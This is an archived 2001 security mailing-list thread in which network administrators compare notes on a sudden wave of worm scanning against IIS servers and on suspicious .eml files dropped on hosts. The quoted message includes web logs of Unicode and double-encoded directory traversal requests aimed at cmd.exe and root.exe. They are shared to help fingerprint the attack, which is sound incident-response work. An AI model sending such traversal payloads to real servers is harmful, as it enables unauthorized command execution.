Re: CodeBlue finally hitting, or what?

From: Tracey Losco (tal1at_private)
Date: Tue Sep 18 2001 - 08:39:15 PDT


    We are seeing the same thing here at NYU.  I just got off of the 
    phone with someone from another University who said that he also saw 
    a group of files deposited this morning approximately the same time 
    that the machines started their poking around.
    
    The files were:
    
    readme.eml
    sample.eml
    desktop.eml
    
    He said that they appear to be executables MIME-encoded as wave files.
    We also started seeing the scanning at approximately 10:00am.
    
    At 10:24 AM -0400 9/18/01, Portnoy, Gary wrote:
    >Greetings,
    >
    >I am suddenly seeing hundreds of Unicode traversal requests coming in from
    >all over the world, many of them from previous CodeRed victims.  I am
    >guessing someone changed CodeBlue to make it spread faster, because before I
    >saw maybe 1 or 2 CodeBlue attempts a day, and so far I've seen at least 20
    >in the last hour.  Just as a way to help fingerprint it, a few of the
    >attempted exploits use the multiple decode vulnerability....
    >
    >-Gary-
    >
    >12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    >12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    >
    >Gary Portnoy
    >Network Administrator
    >gportnoyat_private
    >
    >PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
    >
    >
    >----------------------------------------------------------------------------
    >This list is provided by the SecurityFocus ARIS analyzer service.
    >For more information on this free incident handling, management
    >and tracking system please see: http://aris.securityfocus.com
    
    -- 
    --------------------------------------------------------------------
    Tracey Losco
    Network Security Analyst		securityat_private
    ITS - Network Services			http://www.nyu.edu/its/security
    New York University			(212) 998 - 3433
    
    PGP Fingerprint: 8FFB FE47 6156 7BF0  B19E 462B 9DFE 51F5
    
    